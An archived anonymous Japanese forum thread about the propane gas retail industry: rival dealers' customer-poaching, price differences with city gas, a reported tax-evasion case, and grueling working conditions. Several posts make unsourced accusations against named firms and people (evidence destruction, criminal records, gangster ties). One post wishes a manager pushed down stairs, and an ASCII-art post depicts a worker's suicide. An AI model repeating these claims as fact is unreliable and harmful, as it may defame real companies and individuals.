プロパン裏情報教えてください
■ このスレッドは過去ログ倉庫に格納されています
0001小心なガス屋です
NGNG業界で働くものです。最近、トータル&ニチガスが頻繁に強引な切替営業を
していて、毎日、切替通知FAXがきて、その度に顧客説得にいく毎日です。
仕方なく当方もガス代を下げるからと説得しても(自分でもなんでそうまでして
顧客を説得するのかいささか疑問に思っているが)逆に当方の方が、悪徳業者だ
と思われる始末です。確かにLPガスは、高値安定であったが、先の両者みたいに
安売りしている業者が、(既存の顧客は、高い料金を徴収しているのに)消費者
の味方なのか!そんな業者に対して同じ思いをしている人はいませんか!また、
いろいろな裏情報が知りたいです。
00022get
NGNGむしろ付加価値で高くてもお得ですよという論点で説得すれば?
0003名無しさん@お腹いっぱい。
NGNG同じことやるしかないのでは?
0004名無しさん@お腹いっぱい。
NGNG0005ガス屋
NGNG今は、どの辺、売り込みかけているかな。
0006名無しさん@お腹いっぱい。
NGNGちなみに都市ガスって安いですが、安い理由を
知っている人は教えて貰えませんか?
だってLPでガス暖房なんてしたらボッタクリ
な値段が付くでしょ。
0007田舎のガス屋
NGNG程度か知りたい。
0008しったかのガス屋
NGNG都市ガスとプロパンの価格の違いは、簡単に言えば、原料輸入価格の差と
配送料(プロパンだと人件費がかかる)の違いと思われる。
プロパンでもニチガスやトータル&トーカイに頼めば格安の値段(都市
ガスよりも断然安い)が提示されるよ!一度、試してみたら。
00096
NGNG輸入価格と配送料の差かぁ。
でも何て言うのかな表現としては1立方メートルの
単価が高いような気がするんだよね。
使えば使うほど都市ガスと離れるような感じなんです。
もしかして基本料金+配送料はそうでもないが、
使用量に対する課金が高いのかも知れない。
それからPLの業者って複数あるんだ・・・
考えてみれば当たり前の事なんだが、考えた
事も無かったよ。俺が今の家に生まれてから
ずっと同じ会社のガスだし隣近所もきっと
同じだよね。田舎だから誰も何も言わないのかも
しれない。考えてみればバカげた話だな。
参考になりました。ありがとうございます。
0010しったかのガス屋
NGNG単位は同じ1立方メートルの表示だけど都市ガスとLPガスは、ガス自体の熱量が
違うから、1立方メートルで比較はできないよ。比べるなら、LPガス1立方メー
トル=都市ガス2.6立方メートルで比べてください。
8の追加ですけど、LPガスだとだいたいガス配管をLP会社で費用を負担して
(お客には、請求しない)工事しているから、その分の費用をガス料金に上乗せ
しているから高いんですよ!どのLP会社も工務店や不動産屋の言いなりで本来
もらうべき代金を肩代わりしてさ。知らないのは、お客さんだけって感じ。
0011小心なガス屋です
NGNG0012名無しさん@お腹いっぱい。
NGNGプロパン・ブタンニュースっていう新聞に番付けが時々あるよ。
0013名無しさん@お腹いっぱい。
NGNGちゃんと請求書に書けばいいのでは?
それに無償貸与はガス屋にもメリットあるからやるのでは?
0014名無しさん@お腹いっぱい。
NGNG0015名無しさん@お腹いっぱい。
NGNG人件費、配送費がどうしてもかかるからねえ…
0016名無しさん@お腹いっぱい。
NGNG日付:2002/04/16
ガス販売会社が法人税7000万円脱税・国税局告発
ガス料金の売り上げの一部を除外し、法人税約7000万円を脱税したとして、ガス販売会社「トータルエネルギー」(東京都昭島市)と同社役員ら2人が、東京国税局から法人税法違反の罪で東京地検に告発されていたことが16日、分かった。
関係者によると、同社は家庭用プロパンガスを販売しているが、料金徴収の際、一部の客からは役員名義の口座に振り込ませる手口で、2000年9月期までの3年間に約2億円の法人所得を隠していた。同社はすでに修正申告に応じているという。
http://www3.nikkei.co.jp/kensaku/kekka.cfm?id=2002041605354
0017名無しさん@お腹いっぱい。
NGNGhttp://www.energy-forum.co.jp/kuroi.htm
0018名無しさん@お腹いっぱい。
NGNGの本の著者であるY新聞社の記者は、今回告発されたT社とツーカーの仲らしい。
だから、>16の記事はY新聞には載っていないんだ。
ちなみにT新聞の夕刊には、社長の名前も載っていました。
0019名無しさん@お腹いっぱい。
NGNGTOKAIの役員と石和温泉で会っているのも会長、会長のウケ次第でTOKAIの東京管内の
人事や出世が決まる。
0020名無しさん@お腹いっぱい。
NGNG上場のTに寄生してサナダムシのように利益を吸上げてるからあれだけの脱税ができるんだよ。
上場のTだって通信事業の失敗があるから寄生虫を飼ってる余裕は無いはず。
だけど虫下しが効かないほどTEが成長しちゃってるってわけ。
LPGは高いというが、一般的な小売店で平均価格で営業している会社の決算は
ここ数年、赤字〜微少の黒字程度がほとんど。
暴利を貪っているのは一番元の輸入している卸で、中卸以下は利幅は小さいんだよ。
LNGを使用している都市ガスだって、地方の小さな都市ガス会社の料金はLPGと左程変わらんよ。
東京ガスみたいに大きな会社の方が有利なのはあたりまえ。
それをわからずに小企業を追い込みすぎて倒産が続出すると景気にも大きな影響を及ぼすし、
また、大企業の寡占化が進めばその先にあるのは高額な料金表ですよ。
0021名無しさん@お腹いっぱい。
NGNG小売店の社長連中のシーマ、クラウン、BMWにベンツ。
毎年海外旅行ってのを見てるとね。
0022名無しさん@お腹いっぱい。
NGNG>ここ数年、赤字〜微少の黒字程度がほとんど。
ここ数年だよ。
規制緩和前は輸入価格や仕入価格に応じて利幅が得られるように小売価格を設定できていたの。
だから大幅黒字(ボッタクリ)とまでいかなくてもそれなりの黒字になっていたから
儲かってたんじゃないの?
ところが、規制緩和後は仕入価格が一番安かった時期の値段のまま、
小売価格をいじれない状態になってるんだよ。
だから、規制緩和後は赤字や小幅の黒字に転じてるんだよ。
それに殆どが地主で副収入があるだろ。<小売店の社長
小売店はどんな零細でも殆どが店舗は自分の所の持ち物だし。
0023名無しさん@お腹いっぱい。
NGNGそうなのか、儲からなくなってるのか。
正直、ザマァ見ろだな。
0024名無しさん@お腹いっぱい。
NGNGトータルで口座を変えるのは無いと考えるのが普通。トーカイに客を売った金を国税に見つけられた、
と考えれば素直じゃないかな?当然トーカイも知っている???でしょうね!
0025名無しさん@お腹いっぱい。
NGNG0026名無しさん@お腹いっぱい。
NGNG毎月の給料14万ちょっとです。給与明細見せてくれてるけど意味のわからない理由でいろんなお金がトーカイに還元させらてます。
そのお金がトータルの糞つまんないプロレスに使われているのかと思うと腹が立ちます。
こないだは、「別会社(でも中身は一緒)」のADSLの会社の未公開株を10株50万で強制購入させられました。
毎月の給料で二人食べていくのがやっとなのに、紙切れ同然になりつつあるADSLの会社の株券を50万も出して買う
羽目に合ってからビンボーに拍車が掛かりました。
ガス屋のはずなのに毎年使途不明のレジャーとかゴルフとかの保険は毎年ノルマで
入らなければいけないし、スイカとかメロンとかまで法外な値段で強制購入させられるし、
これじゃ、私がいくら働いても、主人が毎晩午前様まで働いても(残業代一切なし)
体が持ちません。
誰か埼玉営業部の部長を階段から突き落として欲しいです。
某プロレス団体のチケットは欲しくもないのに毎回配られて、ちゃんと観に来たかどうか部長とかがチェックしてる。
あんなつまんないプロレスのために、昭島まで月に一回か二回しかない休日に
行かなくてはならない社員はみんな過労死寸前です。
0027名無しさん@お腹いっぱい。
NGNG強引で皆に嫌われているTOKAIだけど
結局、末端の社員は踏みつけられてんだなぁ。
貧乏人どうしの戦争か… 救いが無いなこりゃ。
0028名無しさん@お腹いっぱい。
NGNG崩壊の序曲が聞こえてきてるよ。
>株券持ってる人
今のうちに売っとかないと、気がつけば紙くずだぞ。
0029名無しさん@お腹いっぱい。
NGNG>>今のうちに売っとかないと、気がつけば紙くずだぞ。
もう、紙くずです。ちり紙交換に福沢センセ50枚出したんだと思ってます。
ウチの主人はガス屋さんなのに、毎週毎週別会社(のはず)のADSLの
契約とるために、土日もどっかの店先で鈴木杏樹の看板ぶら下げて営業してるんです。
T-comの社員はトーカイの社員です。だからパソコンの事聞いてもろくにお返事
出来ません。だって、元はみーんなガス屋さんなんだから。
事業の失敗は目に見えてるのに社長がご高齢で耳でも遠いのかしら?
過労死する前に早く辞めて欲しい。あんな会社。
0030名無しさん@お腹いっぱい。
NGNG0031名無しさん@お腹いっぱい。
NGNGとりあえず職安にちくれ。
0032名無しさん@お腹いっぱい。
NGNG0033弱小ガス屋だよ
NGNG脱税トータルに食われたり昭和ガスの卑劣な攻勢に客をとられたり
して社員こきつかって足元からくずれるぞ!いい思いしているのは
上の人間だけなんだね。みんな若い人、見切りをつけてうちの会社に
きなせう!
0034ガス屋!
NGNGところでトータルの脱税記事が載っている新聞はないですかね。
切替説得の最終武器に使用したいのに!
0035名無しさん@お腹いっぱい。
NGNGLPガス屋って、経営者と、従業員の収入格差が大きいね、ボンベ配送
の連中なんか大変なのにそんなに貰ってないみたい
でも、社長は遊びほうけている感じだったな(これ、中規模同族のLPG屋さん
のことネ)
0036名無しさん@お腹いっぱい。
NGNGニュースのあった日のN経済新聞の夕刊に載っています。
但し、関東地区だけかも知れない。
0037弱小ガス屋だよ
NGNGきている人間は、もとからガス屋じゃないから好き勝手言って元のガス屋
を悪徳業者扱いにして、委任状に判をもらってさぞかし気分がいいだろうよ。
そのうち、いや今すぐ墓穴を掘って問題起こしやがれーーーーー
あっ!トータルは脱税で告発されたか!(でも大々的に騒がれていないのが
寂しい)
0038名無しさん@お腹いっぱい。
NGNG0039名無しさん@お腹いっぱい。
NGNGトータルの社長とかTの部長とか、すごい逃げ足で逃げてった。まさか興行主に折りたたみ椅子は
ぶつけたりしないだろうけどサ、あの逃げ足があれば脱税なんて怖くないんじゃない?
かばんはちゃんと持って走っていったから、あの中身は脱税でポッポナイナイしちゃった
お金がいっぱい詰まってたんだろうね。うらやましいなぁ。
Tはね、国税が入る前日に社員全員で事務所の清掃!とかいってヤバメの書類を環境汚染
バリバリの焚き火ににいれて焼き芋でもしてるみたい。お芋名産品だから。
こないだ逃げちゃった課長はそういう書類をごっそり持ち逃げしたんで、みんな焦ってるし。
いくら国税が頑張ってもさ、みーんな焼き芋の燃料にされてちゃ調べようがないよね。
ガスだけがんばってたころは、社販のお高いスイカくらいだから我慢してきたけど、
失敗してる通信事業の穴埋めにガスの利益までごっそり持って行かれちゃってて
まじめに昔からガス売って(評判悪いけど)いる人たちかわいそうだよね。
ちゃんとガス売ってたころは地味だけど、今みたいにトータルみたいなヤクザな人たちに
頼らなくたって経営なりたってたのに。みんなに嫌われてるから、営業さんたちみんな会社に
見切りをつけていなくなっちゃったんだって。
0040名無しさん@お腹いっぱい。
NGNG中小プロパン屋と社員を喰いまくって会社は安泰!まさに弱肉強食 資本主義の
原点だ。
0041名無しさん@お腹いっぱい。
NGNGいや、雪印のようになると思うぞ…
0042名無しさん@お腹いっぱい。
NGNGでも、その前に中小零細の販売店は淘汰されちゃうだろうね
0043名無しさん@お腹いっぱい。
NGNGニチガスはともかく・・
TOKAIは生き残れないよIT事業の失敗が大き過ぎるもの。
中小の方は小回りが利く分だけに完全な淘汰はありえない。
価格で勝負に出ちゃった中小は淘汰されるだろうけどね。
そもそも、TOKAIを伸びてる会社と見るのは視点がおかしいよ。
確かにガスの販売量は増えてるけど、IT事業に参入する前に比べて儲けは減ってるし。
0044休まず働くTOKAI
NGNG株主総会乗切れないし、借金できなくなるから。
0045名無しさん@お腹いっぱい。
NGNG0046名無しさん@お腹いっぱい。
NGNGたとえ今後それが原因で職無しで主夫してもらうことになっても、
主人をあんな会社に殺されるくらいなら、アタシが体売ってでも
金稼いで食わしていくから、絶対に辞めさせる。
ガスの配管すらCADで描けない課長。工務課のくせにADSLばっかやってて
上司ウケしか狙ってない役立たず。そういうやつらに囲まれて一週間で
関東全県を車で移動しながら何店舗もの工事施工の監督と図面描く主人。
主人のいる課は主人が一人でその課の一年分の売り上げを達成させている。
ほかの2人は給料泥棒。あんな課長たち氏ね。平和な家庭を返せ!!
トータルはね、脱税で追加徴税に出した分のお金はトーカイに怪しげな請求書
だしてちゃんと充填できるから大丈夫。ガスと一緒。ヤバくなったボンベ(社員)
はトラックで転がしてどっかよそへやっちゃえば問題なしだもん。給料はいいらしいけど
人間としての尊厳と引き換えになるよー。プロレス強制参加は必須(w
0047名無しさん@お腹いっぱい。
NGNG0048名無しさん@お腹いっぱい。
NGNG削除対象外
削除対象外
削除対象外
削除対象外
削除対象外
削除対象外
削除対象外
削除対象外
削除対象外
削除対象外
削除対象外
削除対象外
削除対象外
削除対象外
削除対象外
削除対象外
削除対象外
削除対象外
削除対象外
削除対象外
0049休まず働くTOKAI社員
NGNG休みはくれねぇ、いい加減にしてくれ〜 ↑悪い上司を持つと悲惨だねぇ〜!
0050名無しさん@お腹いっぱい。
NGNG自分の体が壊れる前に早くトーカイなんてやめた方が利口だよ!
0051名無しさん@お腹いっぱい。
NGNG問題おこさないかな。(他力本願、寂しいですけど)
0052名無しさん@お腹いっぱい。
NGNG__,, 从爻ミミ
,,-''''"| /゙、 ミミメミ彡|l ,,-──ヽ、
-''"彡ミ/ ̄''/l .ノ ヽミミミ彡| /二‐,'''ヽミミ刈゙ヽ、
彡ミミ/''‐-' |ヽ、 ヽミ ミl L|ヽ/_ /"''‐、ミミ爻リヽ、 ,,,,,,
彡ミ|-、 /|-'.ミ/ 〉ミ |l >ヽ-、_=ノヾ、ミミ;;;;;;;;;;;;;;;;;;;;
彡ミ| ノ、_ノ_,,/ ミ ミl ヽ-‐'''\__,,,,-'ミ;;;;;;;;;;;;''''''"
彡ミ\,,ノ、,,,/ ミミ ミ ゙"''ゝミ,;;;;;;;;''''
三ミ/_ノ |ミミ | ,,;;;;;;;;;'"
三二ソ'" _ |ミミ | __-、 _ _,,,,_ ,,,;;;;;;;;;;;;;''"
ミ三|-'''''""ミミヽ-‐''''"""'''ヽ、 ,,--''""ミ,--、ミ/ 。__゙ヽ,'"ミミミ\;;;;;;;;;;;;;;‐'
ミ |ミミ'''"""ミミ二゙、ミ川川ミミ゙ヽ、ミ,‐、ミミ、 <フ /ヘl‐ヘlミミ,,,,;;;;;;;;;;;;;;;;‐''
ミ / ミ ゙''ミ‐ミミゝ,| ヘヽミ、‐''" /> (>,,;;;;;;;;;;;;;;;;;;''"
/ ミ彡l|〉フ |ミミ、 ./>_ ,,,,,(>;;;;‐'''''''
彡 三川ヽ-,ノミミ )|'"'''''''''''''''''''"
ミ,,ノ彡川ヽ,,,,, ,,, ,,,-:::'''" .三ミ 彡ミ彡ノ |ゝ;;;;;;;;;;;;,,,,,,,,
彡メメ彡川ミ二彡|l '''''''" 彡彡ヽミ/ ヽゝ |''''''‐;;;;;;;;;;;,,,,,,
. ヽ-彡ミ/-、ミ彡-,,,,..... 彡彡ミヽ-、゙、>/| /| ''';;;;;;;;;;;;
彡-丶彡:, /彡三二\、''フ-‐> '''ヽ;;;;;;;;,,
l彡爻\彡,,,, ,,,彡/彡メヽヽ二ノ ,,,,;;;;;-イ'" '';;;;;;;,,,
ヽメ彡刈゙ヽ、ミ,,,,;;;,,,,,, ;;;彡彡三ノ从メ-‐'''" ミ/ '‐;;;;;;;,,,,
0053名無しさん@お腹いっぱい。
NGNG職安じゃなくて、労働基準監督所だ。(つい職安と書いちまった(^^;)
ここの、労働Q&Aとか
ttp://homepage1.nifty.com/rouben/
ここのリンクとか参考に頑張れ。
ttp://oohara.mt.tama.hosei.ac.jp/links/tokushu-sodan.html
0054弱小ガス屋
NGNG0055名無しさん@お腹いっぱい。
NGNG0056素人
NGNG0057名無しさん@お腹いっぱい。
NGNG叶。
0058名無しさん@お腹いっぱい。
NGNGどこのガス業者で、業者には落ち度なかったんでしょうか。
あと、業者に立ち入りとか入るんですかね?
0059名無しさん@お腹いっぱい。
NGNG●トータル警報
東京都三多摩地区
●トータル注意報
神奈川県東部
千葉県北部
埼玉県南部
発令中。
0060名無しさん@お腹いっぱい。
NGNG0061名無しさん@お腹いっぱい。
NGNGこの前ニチガスに切替えられた家の料金表によると
4.7m3で2574円
安い!!!
0062名無しさん@お腹いっぱい。
NGNG0063名無しさん@お腹いっぱい。
NGNG2.Tエネルギーの配管工事している人間の一部は設備士免状を持っていない。
3.一部上場のNやTの料金表は同一使用条件同一使用量の家庭において2倍以上の価格差がある料金表が存在する。
4.通常の業者の価格差は使用条件、使用量によるものであるが公表していない。
0064弱小ガスさんで〜す
NGNG先日、お客取られたので気になります。知ってる方教えて下さい。
0065元アイエス社員
NGNG割と紳士的な会社でした。
東京ガスエネの場合、簡易ガスが多い。
比較的営業はかけてこない
でも、ニチガスは東ガスエネからも奪うので弱小ガス屋もニチガスの料金表を
たくさん手に入れて阻止してください。
アイエスもニチガスから変なアパートとるけどニチガスつぶしは厳しいみたいだYO
0066名無しさん@お腹いっぱい。
NGNGデパートはちっと難しいかな
0067地元ガス屋
NGNG今度は、料金を下げてきた。基本料金1400円従量料金240円だとさ。
それも使用量毎月0m3の需要家なのに。最近、トータルからの売込みを
撤回している件数が増えてきたからあちらもなりふりかまわずきてるね。
しかし、早く千葉も切替え戦争が終わらんかな。
0068プチブルの業界人
NGNG0069地元ガス屋
NGNG0070名無しさん@お腹いっぱい。
NGNGまだまだ先は長そうです。
あそこはついてる弁護士が強いから、どうなることやら・・・。
0071プチブルの業界人
NGNG0072名無しさん@お腹いっぱい。
NGNGお客を差別したり、自社の顧客を守るためにウソや大げさな噂話を流したりと
本当に醜い、ガス屋どうしの勝手な利害関係を無視して、消費者が満足
出来るようにサービスをしていくのが当たり前!
その1つとして切り替えをしてみれば・・・
0073個人商店ですが
NGNGNやTは弁護士の委任状も事前に作成しておりまして非常に強力です。
0074名無しさん@お腹いっぱい。
NGNGニチガスにもトータルにも切り替えられたことのない
ガス屋は沢山あります。
プロパン業界の事を知ると、個人商店もエゲツない事をしてるしね・・・
0075地元ガス屋
NGNGまだ、ニチガスやトータルがいっていない地域じゃないの?
自社の企業努力をしろっていうけど、確かにそうでもあるが、はたして
ニチガス、トータルが企業努力しているのか!もとからの客は、高い料金
で徴収してるくせに人の需要家だけ狙って安い料金を提示してさ。それが
企業努力なのかね。
0076名無しさん@お腹いっぱい。
NGNGガス業界に限らず、どの業界も新規顧客には安く売り込むもんです。
例えばドコモなんて、新規加入には安く、既存客の機種交換には新規加入の料金よりも
高く設定している。
でも、他の通信会社はその事を誹謗や中傷することなく、
独自のサービスや価格で勝負している。
トータルやニチガスも業界を敵にまわしてまで、やることは
ある意味で企業努力と言えるのでは・・・
0077地元ガス屋
NGNG通信会社が同業者を誹謗、中傷しないは、どの会社も善良な会社で
まともに商売しているから。トータルやニチガスには当てはまりません。
やつらがまともに商売しているというのならなぜ、堂々とやらないのか。
まがりなりにも大手と呼ばれているのなら業界をリードするような
会社じゃないと。こそこそ人の顧客のところにいってあることないこと
言いふらして、顧客を奪う。企業努力しているというなら自分たちの
既存の顧客にもサービスしろってもんだ。夜間は対応しない、機器の
修理依頼は、1ヶ月以上もほったらかし。そんな会社が、企業努力して
いる?ちゃんちゃらおかしいよ。マスメディア使ってまともに勝負して
こいよ!
0078名無しさん@お腹いっぱい。
NGNG地元ガス屋こそ、既存の客にサービスしろ!
なぜ、配管使用の金を払い終えてるはずの
家より新築建売客の料金の方が安いのは
あなた方地元業者も、まともじゃないね
0079地元ガス屋
NGNGそれこそ、ニチガスや昭和などだろ!うちは顧客を差別していないよ。
78さんが使っているガス屋がそうなの?だったらトータルやニチガスに
変えた方がいいよ!(^ ^)v
0080名無しさん@お腹いっぱい。
NGNGT田S務、怒り狂ってる。
0081名無しさん@お腹いっぱい。
NGNGTOKAIも東海地域が多いし。
東北、四国、九州に比べて千葉、神奈川は競争厳しい
0082名無しさん@お腹いっぱい。
NGNGT社の方がよっぽど嘘つきですよ。
T社のチラシ
>このような営業行為は、断じてゆるしません!!
>ボンベを無断撤去
>高額な違約金請求
>脅迫まがい客開拓
>T(株)は、お客様中心主義!!
>上記のような営業活動は一切行っておりません!!
って・・平成13年に省令が改正される前まで全てやってた事じゃん(w
で、横に2001年(平成13年)1月10日付読売新聞の「悪質ブローカーもう許さない!」って記事があり
載ってるボンベ横積の車の写真・・ってT社の車だよ・・オイ!
あの記事が掲載された時、読売新聞社に抗議したのはS会長だけだったとか・・
そうそう顧問弁護士はいるけど税理士・会計士はいない様で(w
って言うか
「販売代金の一部を会社の口座ではなく役員個人の口座に振り込ました」ら
背任か横領じゃないの?
それから
「平成9年に液石法が改正されガス会社の選択はお客様の自由になりました」
って営業のしかた・・・これも嘘です。
平成9年以前もガス会社の選択は“自由”です。
計り売りの時代には2社から順番に取っていたお客さんとかいっぱいいたぞ!
正解は
「平成9年の液石法改正により規制緩和され、LPガス業界への参入が許可制から登録制になりました」
即ち新規参入がしやすくなっただけ。
無論、真面目に取り組んでいる業者もいるが、それ以前よりも悪質な業者も参入しやすくなったのも事実。
当時の通産(現:経産)官僚は生協やハウスメーカーなどの参入を想定していたんだろうけどな・・
0083名無しさん@お腹いっぱい。
NGNG0084名無しさん@お腹いっぱい。
NGNGそんなにアツクなるなよ。
まるで、ガス屋全体がT・Eに反応してる様に聞こえるだろ!
T・Eの事をアツク語る前に、ちゃんと仕事しろよ。
>>82の様なアフォーなガス屋は、速やかに逝っちゃって下さい。
0085名無しさん@お腹いっぱい。
NGNG>まるで、ガス屋全体がT・Eに反応してる様に聞こえるだろ!
業界の集まりがあると大抵、話題になるってことは>>82程は過剰反応していなくとも
関東圏のガス屋の殆どが少なからずとも意識、反応しているのでは?
本当はオール電化や都市ガスの方が嫌な存在なんだけどな。
0086名無しさん@お腹いっぱい。
NGNGエルネットって会社は何だ
当日連絡で切り替えやってるけど・・・
情報キボンヌ
0087名無しさん@お腹いっぱい。
NGNG実業って言う会社名からして893の可能性も・・・
0088名無しさん@お腹いっぱい。
NGNG攻めやすいな
0089名無しさん@お腹いっぱい。
NGNG0090名無しさん@お腹いっぱい。
NGNG昭和やISやニチガスは平成9年以前からやってたもんな
0091地元ガス屋
NGNGようにしてきている。トータルごときに金をもらう客ってどうなの?
0092名無しさん@お腹いっぱい。
NGNG持家戸建住宅の場合、
TとかNが回った後に、実際に移動する客は微々たるものだけど、
後追いで東京ガスの営業に回られると大抵持ってかれてる。
販売店への不信感よりLPG業界への不信感を持つ人のほうが多いな・・
0093名無しさん@お腹いっぱい。
NGNGガス料金は自由価格というのを知らない客が悪い!!
家電量販店の価格に不信感を抱く奴がいるか!?
それと同じなんだよ!!
客逝ってよし!
0094名無しさん@お腹いっぱい。
NGNG0095TOKAI社員です
NGNGしょうがないといえば、それまでなんだけど。ただ、みんなの会社は真面目にやっているのかな、うちを悪く言えるぐらいに。
でなきゃ単なる負け犬の遠吠えぐらいにしか思えないんだけど。
0096名無しさん@お腹いっぱい。
NGNG0097名無しさん@お腹いっぱい。
NGNGオタクの元支店長さんが当社に転職してきたよ。
飲酒運転であぼーんされたらしい。よほどのアホだな(w
0098>>93
NGNGそれによって、もっとも優れた経営と技術がもっとも低価格でもっともやすく供給される。
そういう自由競争をあの手この手で阻害してきて何寝言こいてんだよ
DQN業者逝ってよし
客が一番偉い
0099>>97
NGNG大嘘つき野郎だからな。あぼーん理由はチガウゾ。けけけ
0100>97
NGNG0101名無しさん@お腹いっぱい。
NGNG0102名無しさん@お腹いっぱい。
NGNG0103名無しさん@お腹いっぱい。
NGNG0104名無しさん@お腹いっぱい。
NGNGこれだろ?
http://mytown.asahi.com/saitama/news02.asp?kiji=3330
どこのガス屋か、情報きぼん
0105名無しさん@お腹いっぱい。
NGNG「○○さんは精神的に弱い所があって、お辞めになりました」
と新しい就職先にいってくれましたわー。
前職調査は非協力的とおもいますけどね(採用されてからだから)。
同期26名のうち10名は一年未満で辞め、
私が辞める時に残りもほぼ辞めました。
根性ないの見とめますよ〜。でも壊したのはアンタだろうが(w
あ、今の新卒達はもっと「根性が無い」ようですね?大O人事課長。
今年入社の新人で、子会社出向後1日でやめたやついるみたいだし、
5、7、9月と最近は毎週ビーイングにも求人出してるなんて、
自分とこロクな職場じゃないってばらしているようなモンですよ。
あなたが入社したての頃(4半世紀前)と同じように、
上司は姑・部下は嫁な世界では、今時人はいてくれませんよ。
いくら就職難でもね。
(経験があると言う事きかないからって、何も知らない新卒のみ採用するのって、
馬鹿童貞が処女マンセーしてるのと一緒ですよ…)
0106名無しさん@お腹いっぱい。
NGNG供給エリアで新卒以外だったらもっと多い?
あとは辞める率で言ったら何処が多いかね〜?
0107名無しさん@お腹いっぱい。
NGNG>ガス屋はみんな辞めるね・・・
逆に販売店は何十年も同じ顔(w
0108名無しさん@お腹いっぱい。
NGNGをせずに加入させて不当に利益を上げてるわけ。でもこの会社は間違いなくダメだよ。
ADSLがとてつもなく癌だから。
0109名無しさん@お腹いっぱい。
NGNG―――――――――――――‐┬┘
____.____ |
____.____ |
| | | |
| | | | プロパンガス会社で身も心もボロボロになった彼は
| | | ミ | 若くして自ら
| | | | 身を投げ捨てました
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |
∧_∧
( ´Д`) オトウサン、オカアサン・・・
⊂ つ アリガトウ・・サヨナラ・・・
/ / /
し' し 享年26歳
0110名無しさん@お腹いっぱい。
NGNG0111??
NGNG一人の力は、いくら職権があっても限度があるハズ。
0112名無しさん@お腹いっぱい。
NGNGλ...... λ...... λ...... < 俺も辞める
λ...... λ......
λ...... λ......< みんな辞めてくよな…
λ......
λ...... λ...... λ......
0113でぶりん
NGNG0114名無しさん@お腹いっぱい。
NGNG俺は来年新卒でLPガス逝きますが。
そんなにヤバイですか?
0115名無しさん@お腹いっぱい。
NGNG特に件数至上主義の倒壊などはきついそうです。
ADSLがあるため土日も出ることが多々あるそうです。ちなみに取れもしない代休
処理らしいです。涙が出ます。
0116名無しさん@お腹いっぱい。
NGNG販売店逝きですか?
ガスの知識のほか、健康食品など、幅広い知識が必要です。
会社によっては扱うことがあります。
土日は休日だという既成概念があるなら捨てさってください。
連休はこの世に存在しません。
以上。あくまでも会社によりますよ。
まともなところはしっかりしてますから。
0117名無しさん@お腹いっぱい。
NGNG卸売です。かなり競合店がひしめき合ってると
思うんですけど。。土曜は休めないと聞きますた。
0118名無しさん@お腹いっぱい。
NGNG0119名無しさん@お腹いっぱい。
NGNGLPガスはどこも件数至上主義
飛び込み頑張ってください。
個人宅の営業が一番きついですから。
毎月の休みが5〜6日くらいかな。
プロパンで件数至上主義でないところはないでしょう。
ニチガスやTOKAIにどんどん取られる一方ですから。
昭和ガスいいよ。
顧客取られそうになったら朝4時に出勤、ボンベ撤去
日曜日に直接家に行き、撤回のサインしろとかやるんだから。
前にあったニチガスの営業職についてのスレがあるから
それ見たほうが早いよ。
0120119とは別人だが
NGNG119に書かれてるようなのがいやなら、
ど田舎の瓦斯屋がいいでしょうな。
地域によっては、
切替は多少ありますが、
落ち着いたもんです。
調子こいて切替を仕掛けまくる会社が
あろうもんなら、他の会社同士が手を組んで、
集中攻撃します。
ただそれだけに少人口のせいもあり、
件数は伸び悩み、給料も安い罠。
0121名無しさん@お腹いっぱい。
NGNGこの業界で仕事できたからって、他業種逝っても使い物にならないから。
実際、30過ぎて転職成功したやついないよ。
>>114は無能だからLPしか就職決まらなかったといわれても反論できないよ。
まあ、2年たって、>>114の意見がどれだけ変わってるかわからないけど。
俺が>>114の立場なら=まだ新卒の立場ならってことね。すぐに就職活動するけど。
かくいう私もLPやってた。君もDQNスパイラルに入りそうだからあえて苦言を呈しているんだ。
まあ、情報が欲しければ質問してくれ。
昭和、IS、TOKAI,ニチガス、個人商店etc知ってる限りこたえるから。
0122名無しさん@お腹いっぱい。
NGNG0123名無しさん@お腹いっぱい。
NGNG0124名無しさん@お腹いっぱい。
NGNGどちらがよいでしょうか。
それと個人宅への営業ばかり逝かされるのは本当なのですか?
個人宅へは逝かないと聞いたんで・・
0125名無しさん@お腹いっぱい。
NGNG労働条件や仕事の内容を教えてください。。
0126bloom
NGNGhttp://homepage.mac.com/leverage/
0127名無しさん@お腹いっぱい。
NGNG三ツ輪産業はちとわからん、ミツウロコはかなり大手だけど、
個人宅への新規折衝は少ない(ないわけではない)。
そうでもしないと人が集まらない。
いまは、アパートに力入れてるけど、アパートの新規ほうが楽です。
大家に利益誘導すればいいだけだからね。
ニチガスの西関東の某営業所に中学時代の友人がいたが、
そいつの営業所は1年で人が全員辞めたそうじゃ。
プロパンである以上、仕事の内容はどこも同じだよ。
給湯器が壊れた、風呂釜の火がつかないetc・・
現場に行ってもまず直せない(そこまで育てる余裕は無い)。メーカー修理にたらい回しにする場合が多い。
入退去(ガス開けたり閉めたりすること)、検針(使用料計る)、ボンベの配達、
集金(サラ金みたいな取りたて)、新規折衝(個人宅への飛び込み。たいてい相手にされない)
最後の二つだけでも底辺の人間がやるって感じが実感できますね。
土曜休もうなんて考えるな。日曜は新規獲得DAYとして飛び込みだー!!!
0128名無しさん@お腹いっぱい。
NGNG日曜も飛び込みかよやだよ!
三ツ輪から内定もらってんだけど考えてますよ。
0129名無しさん@お腹いっぱい。
NGNG0130名無しさん@お腹いっぱい。
NGNG日曜も飛び込みとは言いきれませんが、仕事はあります(月1から2回)。
昭和ガスは日曜日は工務店、不動産屋とびこみだし、それでいて代休はありません(土曜日も同様)。
ただでさえ少ない人間でやっているし、きついので、人も集まらないという悪循環に陥っています。
ただし、都市ガスの場合は法律で人を入れておく必要があるため半公務員的です。
代休もあるしね。
ニチガスの採用基準:普通自動車免許のみ。あとは体一つで来てください。1年で新卒が半分辞めた年もあるからね。
この業界の人はえてして893が多い。
昭和ガスは他業者をつけまわして罵声をあびせるのが仕事です。昔の海賊みたいです。
ニチガスのある常務は刑務所に入った前科あります。
0131名無しさん@お腹いっぱい。
NGNGおそろしい業界ですね。。
ニチガスはこれから説明会に行くか迷っております。
が、一年無駄にしたくないし・・
0132名無しさん@お腹いっぱい。
NGNG入れ替わりの激しい会社は
ど素人が多いようです。知識ゼロ。
検針=人んちの庭に黙って入って怒られる業務。
ボンベ配送=朝イチで行ったら家の人がまだ寝てて怒られる業務。
集金=金額多めにもらって自分のふところに入れる業務。
修理=行ったもののわかるわけないから、お客さんに適当なこと言って
結局メーカーに丸投げする業務。
入退去=開栓・閉栓といいます。たまにきれいなお姉さんが引っ越してくる
ので、目の保養になります。
0133世間知らずのガス屋
